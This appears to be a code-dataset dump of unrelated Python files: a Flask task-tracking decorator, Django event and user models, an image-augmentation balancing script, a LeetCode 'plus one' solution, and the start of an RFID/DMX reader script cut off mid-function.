return max(self.maxHelper(root.left, minVal, root.val), self.maxHelper(root.right, minVal, root.val))
else:
return max(self.maxHelper(root.left, minVal, maxVal), self.maxHelper(root.right, minVal, maxVal)) | 701 | -6 | 80 |
1887534a7e5f28af7113d96d959b4059062f54ef | 2,037 | py | Python | piperci-noop-gateway/util.py | AFCYBER-DREAM/piperci-noop-faas | de00ce7b4c73bc2170d637b83737646daaa0ffef | [
"MIT"
] | null | null | null | piperci-noop-gateway/util.py | AFCYBER-DREAM/piperci-noop-faas | de00ce7b4c73bc2170d637b83737646daaa0ffef | [
"MIT"
] | 2 | 2019-06-04T20:41:30.000Z | 2019-06-10T17:44:58.000Z | piperci-noop-gateway/util.py | AFCYBER-DREAM/piperci-noop-faas | de00ce7b4c73bc2170d637b83737646daaa0ffef | [
"MIT"
] | 2 | 2019-06-04T20:37:00.000Z | 2019-06-10T17:53:41.000Z | from .config import Config
from flask import g, request
import traceback
from piperci.gman import client as gman_client
| 30.863636 | 87 | 0.518409 | from .config import Config
from flask import g, request
import traceback
from piperci.gman import client as gman_client
def gman_activate(status):
    """Decorator factory: track execution of a Flask view as a GMan task.

    Before the wrapped view runs, a new task is requested from GMan (with
    the initial *status* given here) using the ``run_id``/``project`` fields
    of the request JSON, and the task is stored on ``flask.g`` for any
    downstream code.  After the view returns, the task is marked
    "completed"; if the view raises, the traceback is reported to GMan and
    the task is marked "failed".  In both cases the wrapper returns the
    task dict — the view's own return value is intentionally discarded.
    """
    import functools  # local import keeps the module's import surface unchanged

    def decorator_func(func):
        # functools.wraps preserves the view's __name__/__doc__; without it
        # every decorated view is named "wrapper_func", which collides when
        # Flask derives endpoint names from function names.
        @functools.wraps(func)
        def wrapper_func(*args, **kwargs):
            gman_url = Config["gman"]["url"]
            function_name = f"{Config['name']}"
            run_id = request.get_json().get("run_id")
            project = request.get_json().get("project")
            task = gman_client.request_new_task_id(
                run_id=run_id,
                gman_url=gman_url,
                status=status,
                project=project,
                caller=function_name,
            )
            g.task = task
            try:
                func(*args, **kwargs)
                gman_client.update_task_id(
                    gman_url=gman_url,
                    task_id=task["task"]["task_id"],
                    status="completed",
                    message=f"{function_name} completed successfully.",
                )
                return task
            except Exception:
                # Broad catch is deliberate: any failure in the view must be
                # reported to GMan rather than propagate to the client.
                message = traceback.format_exc()
                gman_client.update_task_id(
                    gman_url=gman_url,
                    status="failed",
                    task_id=task["task"]["task_id"],
                    message=f"Failed to execute {function_name}. Exception: {message}",
                )
                return task
        return wrapper_func
    return decorator_func
def gman_delegate(r, *args, **kwargs):
    """Record the outcome of delegating execution to another service.

    Inspects the HTTP response *r*: a 202 means the remote accepted the
    work ("delegated"), anything else is reported as "failed".  The status
    is written to the current request's GMan task (``g.task``) and *r* is
    returned unchanged so this can be used as a response hook.
    """
    gman_url = Config["gman"]["url"]
    task_id = g.task["task"]["task_id"]
    if r.status_code == 202:
        status, message = "delegated", f"Delegated execution to {r.url}"
    else:
        status, message = "failed", f"Failed to delegate execution to {r.url}"
    gman_client.update_task_id(
        gman_url=gman_url,
        task_id=task_id,
        status=status,
        message=message,
    )
    return r
| 1,867 | 0 | 46 |
4df974424240e530d6a7c444cbba25488b0072fc | 5,042 | py | Python | results/models/events.py | sjal-tilasto/sal-kiti | cfaf5d3e346d2eb7f4a762b6fd536b3442665f94 | [
"MIT"
] | 1 | 2021-06-12T08:46:32.000Z | 2021-06-12T08:46:32.000Z | results/models/events.py | sjal-tilasto/sal-kiti | cfaf5d3e346d2eb7f4a762b6fd536b3442665f94 | [
"MIT"
] | 8 | 2020-07-01T15:06:52.000Z | 2022-02-20T09:11:23.000Z | results/models/events.py | sjal-tilasto/sal-kiti | cfaf5d3e346d2eb7f4a762b6fd536b3442665f94 | [
"MIT"
] | 3 | 2020-03-01T17:02:24.000Z | 2020-07-05T14:37:59.000Z | from django.core.validators import RegexValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
from dry_rest_permissions.generics import authenticated_users
from results.mixins.change_log import LogChangesMixing
from results.models.organizations import Organization
class Event(LogChangesMixing, models.Model):
"""Stores a single event.
Related to
- :class:`.organization.Organization`
"""
name = models.CharField(max_length=255, verbose_name=_('Name'))
description = models.TextField(blank=True, verbose_name=_('Description'))
date_start = models.DateField(verbose_name=_('Start date'))
date_end = models.DateField(verbose_name=_('End date'))
location = models.CharField(max_length=255, verbose_name=_('Location'))
organization = models.ForeignKey(Organization, on_delete=models.SET_NULL, null=True)
approved = models.BooleanField(default=False, verbose_name=_('Approved'))
locked = models.BooleanField(default=False, verbose_name=_('Edit lock'))
public = models.BooleanField(default=False, verbose_name=_('Public'))
categories = models.TextField(blank=True, verbose_name=_('Competition categories'))
optional_dates = models.TextField(blank=True, verbose_name=_('Optional dates'))
web_page = models.URLField(blank=True, verbose_name=_('Web page'))
invitation = models.URLField(blank=True, verbose_name=_('Invitation URL'))
notes = models.TextField(blank=True, verbose_name=_('Generic notes'))
safety_plan = models.BooleanField(default=False, verbose_name=_('Safety plan exists'))
international = models.BooleanField(default=False, verbose_name=_('International competition'))
toc_agreement = models.BooleanField(default=False, verbose_name=_('Terms and Conditions agreement'))
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))
updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated at'))
@staticmethod
@staticmethod
@authenticated_users
@authenticated_users
@authenticated_users
class EventContact(LogChangesMixing, models.Model):
"""Stores a single contact for the event.
Related to
- :class:`.events.EventRegistration`
"""
TYPE_CHOICES = [
('contact', _('Generic contact')),
('manager', _('Competition manager')),
('head judge', _('Head judge')),
('technical', _('Technical manager'))
]
phone_regex = RegexValidator(regex=r'^\+?1?\d{7,15}$',
message=_('Phone number may start with "+" and only contain digits.'))
event = models.ForeignKey(Event, on_delete=models.CASCADE)
type = models.CharField(max_length=10, choices=TYPE_CHOICES, verbose_name=_('Contact type'))
first_name = models.CharField(max_length=100, verbose_name=_('First name'))
last_name = models.CharField(max_length=100, verbose_name=_('Last name'))
email = models.EmailField(blank=True, verbose_name=_('Email address'))
phone = models.CharField(max_length=17, validators=[phone_regex], blank=True, verbose_name=_('Phone number'))
@staticmethod
@staticmethod
@authenticated_users
@authenticated_users
@authenticated_users
| 40.336 | 113 | 0.693971 | from django.core.validators import RegexValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
from dry_rest_permissions.generics import authenticated_users
from results.mixins.change_log import LogChangesMixing
from results.models.organizations import Organization
class Event(LogChangesMixing, models.Model):
    """A single competition event.

    Related to
    - :class:`.organization.Organization`
    """
    name = models.CharField(max_length=255, verbose_name=_('Name'))
    description = models.TextField(blank=True, verbose_name=_('Description'))
    date_start = models.DateField(verbose_name=_('Start date'))
    date_end = models.DateField(verbose_name=_('End date'))
    location = models.CharField(max_length=255, verbose_name=_('Location'))
    organization = models.ForeignKey(Organization, on_delete=models.SET_NULL, null=True)
    approved = models.BooleanField(default=False, verbose_name=_('Approved'))
    locked = models.BooleanField(default=False, verbose_name=_('Edit lock'))
    public = models.BooleanField(default=False, verbose_name=_('Public'))
    categories = models.TextField(blank=True, verbose_name=_('Competition categories'))
    optional_dates = models.TextField(blank=True, verbose_name=_('Optional dates'))
    web_page = models.URLField(blank=True, verbose_name=_('Web page'))
    invitation = models.URLField(blank=True, verbose_name=_('Invitation URL'))
    notes = models.TextField(blank=True, verbose_name=_('Generic notes'))
    safety_plan = models.BooleanField(default=False, verbose_name=_('Safety plan exists'))
    international = models.BooleanField(default=False, verbose_name=_('International competition'))
    toc_agreement = models.BooleanField(default=False, verbose_name=_('Terms and Conditions agreement'))
    created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))
    updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated at'))

    def __str__(self):
        return '%s %s' % (self.date_start, self.name)

    class Meta:
        ordering = ['-date_start', 'name']
        verbose_name = _('Event')
        verbose_name_plural = verbose_name

    @staticmethod
    def has_read_permission(request):
        """Event lists are readable by everyone."""
        return True

    def has_object_read_permission(self, request):
        """Individual events are readable by everyone."""
        return True

    @staticmethod
    @authenticated_users
    def has_write_permission(request):
        """Any authenticated user may attempt writes; object checks decide."""
        return True

    @authenticated_users
    def has_object_write_permission(self, request):
        """Staff and superusers may always write; members of the owning
        organization's group may write only while the event is unlocked."""
        user = request.user
        org_member_can_edit = (self.organization.group in user.groups.all()
                               and not self.locked)
        return user.is_staff or user.is_superuser or org_member_can_edit

    @authenticated_users
    def has_object_update_permission(self, request):
        """Same policy as writes: staff/superusers, or unlocked org members."""
        user = request.user
        org_member_can_edit = (self.organization.group in user.groups.all()
                               and not self.locked)
        return user.is_staff or user.is_superuser or org_member_can_edit
class EventContact(LogChangesMixing, models.Model):
    """A single contact person for an event.

    Related to
    - :class:`.events.EventRegistration`
    """
    TYPE_CHOICES = [
        ('contact', _('Generic contact')),
        ('manager', _('Competition manager')),
        ('head judge', _('Head judge')),
        ('technical', _('Technical manager'))
    ]
    phone_regex = RegexValidator(regex=r'^\+?1?\d{7,15}$',
                                 message=_('Phone number may start with "+" and only contain digits.'))
    event = models.ForeignKey(Event, on_delete=models.CASCADE)
    type = models.CharField(max_length=10, choices=TYPE_CHOICES, verbose_name=_('Contact type'))
    first_name = models.CharField(max_length=100, verbose_name=_('First name'))
    last_name = models.CharField(max_length=100, verbose_name=_('Last name'))
    email = models.EmailField(blank=True, verbose_name=_('Email address'))
    phone = models.CharField(max_length=17, validators=[phone_regex], blank=True, verbose_name=_('Phone number'))

    def __str__(self):
        return '%s: %s %s' % (self.type, self.first_name, self.last_name)

    @staticmethod
    def has_read_permission(request):
        """Contact lists are readable by everyone."""
        return True

    def has_object_read_permission(self, request):
        """Individual contacts are readable by everyone."""
        return True

    @staticmethod
    @authenticated_users
    def has_write_permission(request):
        """Any authenticated user may attempt writes; object checks decide."""
        return True

    @authenticated_users
    def has_object_write_permission(self, request):
        """Staff and superusers may always write; members of the owning
        event's organization group may write only while the event is unlocked."""
        user = request.user
        org_member_can_edit = (self.event.organization.group in user.groups.all()
                               and not self.event.locked)
        return user.is_staff or user.is_superuser or org_member_can_edit

    @authenticated_users
    def has_object_update_permission(self, request):
        """Same policy as writes: staff/superusers, or unlocked org members."""
        user = request.user
        org_member_can_edit = (self.event.organization.group in user.groups.all()
                               and not self.event.locked)
        return user.is_staff or user.is_superuser or org_member_can_edit
| 1,344 | 109 | 343 |
5a278cb657287dde3cbd4d5c426a4c6088ce0595 | 6,152 | py | Python | Balance/Main.py | HarveyC9846/MoleCheck | 1f7f068e09577a368b4957b963c13a4e5b353975 | [
"MIT"
] | null | null | null | Balance/Main.py | HarveyC9846/MoleCheck | 1f7f068e09577a368b4957b963c13a4e5b353975 | [
"MIT"
] | null | null | null | Balance/Main.py | HarveyC9846/MoleCheck | 1f7f068e09577a368b4957b963c13a4e5b353975 | [
"MIT"
] | null | null | null | import os
import pandas
import PIL.Image as pil
import numpy
import shutil
from sklearn.model_selection import train_test_split as holdout
from sklearn.model_selection import StratifiedKFold as fold
from keras.preprocessing.image import ImageDataGenerator as idg
strOutputPath = "Output/"


def _reset_dir(path):
    """Create *path*, wiping any previous contents."""
    try:
        os.makedirs(path)
    except OSError:
        # Directory already exists (or is otherwise blocked): recreate it.
        shutil.rmtree(path)
        os.makedirs(path)


def _augment_balanced(table_csv, image_root, out_root, sample_size):
    """Oversample every class in *table_csv* to *sample_size* rows and write
    one randomly augmented copy of each sampled image under *out_root*.

    table_csv   -- input split CSV with "image" and "result" columns
    image_root  -- directory holding one sub-directory per class label
    out_root    -- output split directory; receives Table.csv and Image/<class>/
    sample_size -- number of rows drawn (with replacement) per class
    """
    data = pandas.read_csv(table_csv)
    sampled = []
    for label in data["result"].unique():
        # Re-seed before each class so every class's draw is reproducible,
        # matching the original script's behaviour exactly.
        numpy.random.seed(2018)
        sampled.append(data.loc[data["result"] == label].sample(sample_size, replace=True))
    balanced = pandas.concat(sampled)
    balanced["id"] = range(balanced.shape[0])
    os.makedirs(out_root, exist_ok=True)
    balanced.to_csv(out_root + "Table.csv", index=False)
    # One generator suffices: each flow() call draws a fresh random transform.
    generator = idg(rotation_range=360, horizontal_flip=True, vertical_flip=True)
    for _, row in balanced.iterrows():
        label = str(row["result"])
        image = pil.open(image_root + label + "/" + row["image"])
        batch = numpy.array(image)
        batch = batch.reshape((1,) + batch.shape)
        augmented = generator.flow(batch).next()
        augmented = pil.fromarray(augmented[0, :, :, :].astype("uint8"))
        image_dir = out_root + "Image/" + label + "/"
        os.makedirs(image_dir, exist_ok=True)
        augmented.save(image_dir + str(row["id"]) + ".jpg")


_reset_dir(strOutputPath)

################################################################################
##
## 1. Balance the holdout split (train oversampled to 100k/class, valid 10k).
for split, size in (("Train", 100000), ("Valid", 10000)):
    _augment_balanced("Holdout/" + split + "/Table.csv",
                      "Holdout/" + split + "/Image/",
                      strOutputPath + "Holdout/" + split + "/",
                      size)

################################################################################
##
## 2. Balance every cross-validation fold with the same sizes.
for strFold in os.listdir("Fold/"):
    for split, size in (("Train", 100000), ("Valid", 10000)):
        _augment_balanced("Fold/" + strFold + "/" + split + "/Table.csv",
                          "Fold/" + strFold + "/" + split + "/Image/",
                          strOutputPath + "Fold/" + strFold + "/" + split + "/",
                          size)
| 38.691824 | 99 | 0.6263 | import os
import pandas
import PIL.Image as pil
import numpy
import shutil
from sklearn.model_selection import train_test_split as holdout
from sklearn.model_selection import StratifiedKFold as fold
from keras.preprocessing.image import ImageDataGenerator as idg
strOutputPath = "Output/"


def _reset_dir(path):
    """Create *path*, wiping any previous contents."""
    try:
        os.makedirs(path)
    except OSError:
        # Directory already exists (or is otherwise blocked): recreate it.
        shutil.rmtree(path)
        os.makedirs(path)


def _augment_balanced(table_csv, image_root, out_root, sample_size):
    """Oversample every class in *table_csv* to *sample_size* rows and write
    one randomly augmented copy of each sampled image under *out_root*.

    table_csv   -- input split CSV with "image" and "result" columns
    image_root  -- directory holding one sub-directory per class label
    out_root    -- output split directory; receives Table.csv and Image/<class>/
    sample_size -- number of rows drawn (with replacement) per class
    """
    data = pandas.read_csv(table_csv)
    sampled = []
    for label in data["result"].unique():
        # Re-seed before each class so every class's draw is reproducible,
        # matching the original script's behaviour exactly.
        numpy.random.seed(2018)
        sampled.append(data.loc[data["result"] == label].sample(sample_size, replace=True))
    balanced = pandas.concat(sampled)
    balanced["id"] = range(balanced.shape[0])
    os.makedirs(out_root, exist_ok=True)
    balanced.to_csv(out_root + "Table.csv", index=False)
    # One generator suffices: each flow() call draws a fresh random transform.
    generator = idg(rotation_range=360, horizontal_flip=True, vertical_flip=True)
    for _, row in balanced.iterrows():
        label = str(row["result"])
        image = pil.open(image_root + label + "/" + row["image"])
        batch = numpy.array(image)
        batch = batch.reshape((1,) + batch.shape)
        augmented = generator.flow(batch).next()
        augmented = pil.fromarray(augmented[0, :, :, :].astype("uint8"))
        image_dir = out_root + "Image/" + label + "/"
        os.makedirs(image_dir, exist_ok=True)
        augmented.save(image_dir + str(row["id"]) + ".jpg")


_reset_dir(strOutputPath)

################################################################################
##
## 1. Balance the holdout split (train oversampled to 100k/class, valid 10k).
for split, size in (("Train", 100000), ("Valid", 10000)):
    _augment_balanced("Holdout/" + split + "/Table.csv",
                      "Holdout/" + split + "/Image/",
                      strOutputPath + "Holdout/" + split + "/",
                      size)

################################################################################
##
## 2. Balance every cross-validation fold with the same sizes.
for strFold in os.listdir("Fold/"):
    for split, size in (("Train", 100000), ("Valid", 10000)):
        _augment_balanced("Fold/" + strFold + "/" + split + "/Table.csv",
                          "Fold/" + strFold + "/" + split + "/Image/",
                          strOutputPath + "Fold/" + strFold + "/" + split + "/",
                          size)
| 0 | 0 | 0 |
eaf969f36fe620fba4812b6fe3efcad27770645a | 97 | py | Python | mundo1-Fundamentos/025 - Procurando uma string dentro de outra.py | jonasht/CursoEmVideo-CursoDePython3 | a1bbf1fe4226b1828213742ee5a440278d903fd1 | [
"MIT"
] | null | null | null | mundo1-Fundamentos/025 - Procurando uma string dentro de outra.py | jonasht/CursoEmVideo-CursoDePython3 | a1bbf1fe4226b1828213742ee5a440278d903fd1 | [
"MIT"
] | null | null | null | mundo1-Fundamentos/025 - Procurando uma string dentro de outra.py | jonasht/CursoEmVideo-CursoDePython3 | a1bbf1fe4226b1828213742ee5a440278d903fd1 | [
"MIT"
] | null | null | null | nome = str(input("Nome: ")).strip()
print('o nome tem silva {}'.format('silva' in nome.lower()))
| 32.333333 | 60 | 0.628866 | nome = str(input("Nome: ")).strip()
print(f"o nome tem silva {'silva' in nome.lower()}")  # True/False report
| 0 | 0 | 0 |
00cfeed242a224515dc25bfcd65118925fba69a5 | 6,307 | py | Python | backend_admin/models.py | sougannkyou/AppSimulator | 0803d557b0451b049f11e90c258ec11f7074a2ac | [
"MIT"
] | 6 | 2018-10-21T03:41:03.000Z | 2021-12-17T11:09:50.000Z | backend_admin/models.py | sougannkyou/AppSimulator | 0803d557b0451b049f11e90c258ec11f7074a2ac | [
"MIT"
] | null | null | null | backend_admin/models.py | sougannkyou/AppSimulator | 0803d557b0451b049f11e90c258ec11f7074a2ac | [
"MIT"
] | 4 | 2020-01-30T14:46:50.000Z | 2021-12-04T01:07:46.000Z | # coding:utf-8
from django.contrib.auth.models import AbstractUser, Permission
from django.db import models
# 部门
# 用户管理模块models
# class PermissionRead(models.Model):
# read_permission = models.OneToOneField(Permission, verbose_name='子模块权限')
# 全站管理models
# 配置管理分组
| 38.932099 | 104 | 0.718091 | # coding:utf-8
from django.contrib.auth.models import AbstractUser, Permission
from django.db import models
# Departments (部门)
class Departments(models.Model):
    """A department in the organisation tree."""
    # Display name of the department.
    name = models.CharField(verbose_name='部门名称', max_length=50)
    # Denormalised member count; defaults to 0.
    member_num = models.IntegerField(verbose_name='部门人数', default=0)
    # Plain integer id of the parent department (0 = top level), not a ForeignKey.
    parent = models.IntegerField(verbose_name='所属部门', default=0)
    # Depth of this department in the tree; optional.
    level = models.IntegerField(verbose_name='部门级别', blank=True, null=True)
    def __str__(self):
        # e.g. "Sales---3"; the id suffix disambiguates duplicate names.
        return self.name + '---' + str(self.id)
# User-management module models (用户管理模块)
class User(AbstractUser):
    """Custom auth user with a display name and a denormalised role string."""
    nickname = models.CharField(verbose_name='姓名', max_length=50)
    email_required = models.EmailField(verbose_name='电子邮箱', )
    # Human-readable summary of the user's groups, refreshed in save().
    role = models.CharField(max_length=200, verbose_name='角色', blank=True, default='无角色')
    class Meta:
        verbose_name = '用户'
        verbose_name_plural = verbose_name
        ordering = ['-id']
    def __str__(self):
        return self.username
    def save(self, *args, **kwargs):
        """Persist the user, then recompute ``role`` from groups and persist again.

        NOTE(review): this deliberately saves twice — the first save
        guarantees a primary key so ``self.groups`` can be queried, the
        second stores the recomputed role.  Each call therefore issues two
        DB writes; confirm this is acceptable before changing.
        """
        super(User, self).save(*args, **kwargs)
        groups_name = self.groups.all()
        if self.is_superuser == 1:
            self.role = '超级管理员'
        elif len(groups_name) > 0:
            # Join all group names into a comma-separated role string.
            groups_list = list()
            for i in groups_name:
                groups_list.append(i.name)
            self.role = ','.join(groups_list)
        else:
            self.role = '无任何权限'
        super(User, self).save(*args, **kwargs)
    def re_save(self):
        """Re-run save() so ``role`` is refreshed after group changes."""
        self.save()
# class PermissionRead(models.Model):
# read_permission = models.OneToOneField(Permission, verbose_name='子模块权限')
class PermissionGroups(models.Model):
    """A named bundle of Django permissions."""
    groups_name = models.CharField(verbose_name='名称', max_length=50)
    groups_permissions = models.ManyToManyField(Permission, verbose_name='权限', blank=True)
    def __str__(self):
        return self.groups_name
# Site-wide management models (全站管理)
class AllSite(models.Model):
    """A crawler module registered for site-wide management."""
    model_name = models.CharField(verbose_name='模块名称', max_length=20)
    class Meta:
        verbose_name = '全站爬虫'
        verbose_name_plural = verbose_name
        ordering = ['-id']
# Configuration-management grouping (配置管理分组)
class GroupConfigEach(models.Model):
    """A user-created group for individual configurations."""
    name = models.CharField(verbose_name='组名', max_length=30)
    # NOTE(review): ForeignKey without on_delete — this code targets Django < 2.0.
    user = models.ForeignKey(User, verbose_name='创建者')
    def __str__(self):
        return self.name
    class Meta:
        verbose_name = '配置分组'
        verbose_name_plural = verbose_name
        ordering = ['-id']
class GroupConfigManager(models.Model):
    """A user-created group for configuration management."""
    name = models.CharField(verbose_name='组名', max_length=30)
    # NOTE(review): ForeignKey without on_delete — this code targets Django < 2.0.
    user = models.ForeignKey(User, verbose_name='创建者')
    def __str__(self):
        return self.name
    class Meta:
        verbose_name = '配置管理组'
        verbose_name_plural = verbose_name
        ordering = ['-id']
class UserConfigEach(models.Model):
    """Link between a user and a config group, with an access level."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    group_config_each = models.ForeignKey(GroupConfigEach, on_delete=models.CASCADE)
    # Access/permission level within the group; semantics defined by callers.
    level = models.IntegerField(default=0, blank=True)
class UserConfigManagerLevel(models.Model):
    """Link between a user and a config-manager group, with an access level."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    group_config_manager = models.ForeignKey(GroupConfigManager, on_delete=models.CASCADE)
    # Access/permission level within the group; semantics defined by callers.
    level = models.IntegerField(default=0, blank=True)
class UserDeploy(models.Model):
    """Per-user exclusion settings for the various crawl jobs.

    Each ``*_exclude`` field appears to hold the excluded values themselves
    and its ``*_exclude_group`` companion a related group reference — both
    stored as plain CharFields; confirm the exact encoding with the code
    that reads them.
    """
    # NOTE(review): ForeignKey without on_delete — this code targets Django < 2.0.
    user = models.ForeignKey(User, verbose_name='用户')
    delta_domain_exclude = models.CharField(max_length=2000, verbose_name='时间差新闻域名排除', null=True)
    delta_domain_exclude_group = models.CharField(max_length=200, verbose_name='时间差新闻域名排除', null=True)
    delta_user_exclude = models.CharField(max_length=2000, verbose_name='时间差用户排除', null=True)
    delta_user_exclude_group = models.CharField(max_length=200, verbose_name='时间差用户排除', null=True)
    delta_config_exclude = models.CharField(max_length=2000, verbose_name='时间差新闻配置排除', null=True)
    delta_config_exclude_group = models.CharField(max_length=200, verbose_name='时间差新闻配置排除', null=True)
    config_groups_exclude = models.CharField(max_length=2000, verbose_name='配置分组排除', null=True)
    config_groups_exclude_group = models.CharField(max_length=200, verbose_name='配置分组排除', null=True)
    delta_alldomains_exclude = models.CharField(max_length=2000, verbose_name='所有域名排除', null=True)
    delta_alldomains_exclude_group = models.CharField(max_length=200, verbose_name='所有域名排除', null=True)
    delta_allconfigs_exclude = models.CharField(max_length=2000, verbose_name='所有配置排除', null=True)
    delta_allconfigs_exclude_group = models.CharField(max_length=200, verbose_name='所有配置排除', null=True)
    forums_domain_exclude = models.CharField(max_length=2000, verbose_name='时间差论坛域名排除', null=True)
    forums_domain_exclude_group = models.CharField(max_length=200, verbose_name='时间差论坛域名排除', null=True)
    forums_user_exclude = models.CharField(max_length=2000, verbose_name='时间差论坛域名不去重排除', null=True)
    forums_user_exclude_group = models.CharField(max_length=200, verbose_name='时间差论坛域名不去重排除', null=True)
    forums_config_exclude = models.CharField(max_length=2000, verbose_name='时间差论坛配置排除', null=True)
    forums_config_exclude_group = models.CharField(max_length=200, verbose_name='时间差论坛配置排除', null=True)
    # Temporary use (暂时使用): counter of WeChat static-url conversions.
    wx_url = models.IntegerField(verbose_name='微信静态url转换次数', default=0)
class ObjType(models.Model):
    """Registry mapping an object-type name to its backing model name."""
    obj_name = models.CharField(max_length=100, verbose_name='对象名称', null=False)
    obj_model = models.CharField(max_length=100, verbose_name='对象对应model', null=True)
    class Meta:
        verbose_name = '对象类型'
        verbose_name_plural = verbose_name
        ordering = ['-id']
class UserLog(models.Model):
    """Audit record of a single user operation."""
    # NOTE(review): ForeignKey without on_delete — this code targets Django < 2.0.
    user = models.ForeignKey(User, verbose_name='用户')
    # Denormalised copy of the user's display name at the time of the action.
    author = models.CharField(max_length=100, verbose_name='用户姓名')
    app_label = models.CharField(max_length=100, verbose_name='app名称', null=True)
    obj_type = models.CharField(max_length=100, verbose_name='对象类型', null=True)
    obj = models.CharField(max_length=100, verbose_name='操作对象', null=True)
    operate_type = models.CharField(max_length=100, verbose_name='操作类型', null=True)
    operate = models.CharField(max_length=100, verbose_name='操作', null=True)
    comment = models.CharField(max_length=300, verbose_name='备注', null=True)
    # Stored as an integer — presumably a Unix timestamp; confirm with writers.
    time = models.IntegerField(verbose_name='操作时间', null=True)
    class Meta:
        verbose_name = '用户操作记录'
        verbose_name_plural = verbose_name
        ordering = ['-id']
| 635 | 5,692 | 249 |
05c6a9828f005d04f294431c158fe961d52847bf | 2,196 | py | Python | src/leetcodepython/math/plus_one_66.py | zhangyu345293721/leetcode | 1aa5bcb984fd250b54dcfe6da4be3c1c67d14162 | [
"MIT"
] | 90 | 2018-12-25T06:01:30.000Z | 2022-01-03T14:01:26.000Z | src/leetcodepython/math/plus_one_66.py | zhangyu345293721/leetcode | 1aa5bcb984fd250b54dcfe6da4be3c1c67d14162 | [
"MIT"
] | 1 | 2020-08-27T09:53:49.000Z | 2020-08-28T08:57:49.000Z | src/leetcodepython/math/plus_one_66.py | zhangyu345293721/leetcode | 1aa5bcb984fd250b54dcfe6da4be3c1c67d14162 | [
"MIT"
] | 27 | 2019-01-02T01:41:32.000Z | 2022-01-03T14:01:30.000Z | # encoding='utf-8'
'''
/**
* This is the solution of No. 66 problem in the LeetCode,
* the website of the problem is as follow:
* https://leetcode-cn.com/problems/plus-one
* <p>
* The description of problem is as follow:
* ==========================================================================================================
* 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
* <p>
* 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
* <p>
* 你可以假设除了整数 0 之外,这个整数不会以零开头。
* <p>
* 示例 1:
* <p>
* 输入: [1,2,3]
* 输出: [1,2,4]
* 解释: 输入数组表示数字 123。
* 示例 2:
* <p>
* 输入: [4,3,2,1]
* 输出: [4,3,2,2]
* 解释: 输入数组表示数字 4321。
* <p>
* 来源:力扣(LeetCode)
* 链接:https://leetcode-cn.com/problems/plus-one
* 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
* ==========================================================================================================
*
* @author zhangyu (zhangyuyu417@gmail.com)
*/
'''
from typing import List
if __name__ == '__main__':
digits = [9, 9]
solution = Solution()
result = solution.plus_one2(digits)
print(result)
assert result == [1, 0, 0]
| 23.869565 | 109 | 0.431694 | # encoding='utf-8'
'''
/**
* This is the solution of No. 66 problem in the LeetCode,
* the website of the problem is as follow:
* https://leetcode-cn.com/problems/plus-one
* <p>
* The description of problem is as follow:
* ==========================================================================================================
* 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
* <p>
* 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
* <p>
* 你可以假设除了整数 0 之外,这个整数不会以零开头。
* <p>
* 示例 1:
* <p>
* 输入: [1,2,3]
* 输出: [1,2,4]
* 解释: 输入数组表示数字 123。
* 示例 2:
* <p>
* 输入: [4,3,2,1]
* 输出: [4,3,2,2]
* 解释: 输入数组表示数字 4321。
* <p>
* 来源:力扣(LeetCode)
* 链接:https://leetcode-cn.com/problems/plus-one
* 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
* ==========================================================================================================
*
* @author zhangyu (zhangyuyu417@gmail.com)
*/
'''
from typing import List
class Solution:
def plus_one(self, digits: List[int]) -> List[int]:
'''
一个数组加1操作
Args:
digits: 数组数字
Returns:
加1后结果
'''
result = []
count = 1
for num in reversed(digits):
if count == 1:
sum = num + 1
if sum > 9:
result.insert(0, 0)
else:
result.insert(0, sum)
count = 0
else:
result.insert(0, num)
if count == 1:
result.insert(0, 1)
return result
def plus_one2(self, digits: List[int]) -> List[int]:
'''
一个数组加1操作
Args:
digits: 数组数字
Returns:
加1后结果
'''
if not digits or len(digits) < 1:
return []
i = len(digits) - 1
while i >= 0:
if digits[i] != 9:
digits[i] += 1
return digits
digits[i] = 0
i -= 1
result = [0] * (len(digits) + 1)
result[0] = 1
return result
if __name__ == '__main__':
digits = [9, 9]
solution = Solution()
result = solution.plus_one2(digits)
print(result)
assert result == [1, 0, 0]
| 0 | 1,169 | 23 |
75076a96adeb4ff6cf378d14e9c94d30efc3d940 | 6,252 | py | Python | LichtpaalReader.py | kaosbeat/datakamp | 7ac90249b34aa4c3604fa4965ab124ab82d64ac3 | [
"MIT"
] | null | null | null | LichtpaalReader.py | kaosbeat/datakamp | 7ac90249b34aa4c3604fa4965ab124ab82d64ac3 | [
"MIT"
] | null | null | null | LichtpaalReader.py | kaosbeat/datakamp | 7ac90249b34aa4c3604fa4965ab124ab82d64ac3 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
# RFID Read
#
import os,sys
import json
import time
import rfidiot
from RFIDapi import *
import array
from ola.ClientWrapper import ClientWrapper
import config
barSignal = 0  # NOTE(review): not referenced anywhere in this file as shown -- confirm before removing
dmxwrapper = ClientWrapper()  # shared OLA client wrapper used for sending DMX frames
dmxuniverse = 1  # DMX universe number the light fixtures listen on
readerid = config.settings['readerID']  # this reader station's id, read from local config
print readerid
####################### DMX FUNCTIONS ################
# Card reader Functions
def open_reader():
    """ Attempts to open the card reader """
    # Returns the rfidiot card object on success. On any failure the bare
    # except prints a message and terminates the whole process via sys.exit().
    try:
        card = rfidiot.card
        return card
    except:
        # NOTE(review): bare `except:` hides the underlying error -- consider
        # logging the caught exception before exiting.
        print "Couldn't open reader!"
        sys.exit()
    # Unreachable in practice: the try branch returns and the except branch exits.
    return None
def listen(card, interval):
    """ Listens for a card to be placed on the reader """
    # NOTE(review): despite `while 1` this loop never breaks or returns, so
    # the caller's `card_id = listen(...)` can only be left via an exception
    # (e.g. KeyboardInterrupt). `interval` is accepted but never used here,
    # so the loop busy-polls card.select() with no sleep between polls.
    while 1:
        if card.select():
            #confirmationDMX()
            # print readerid
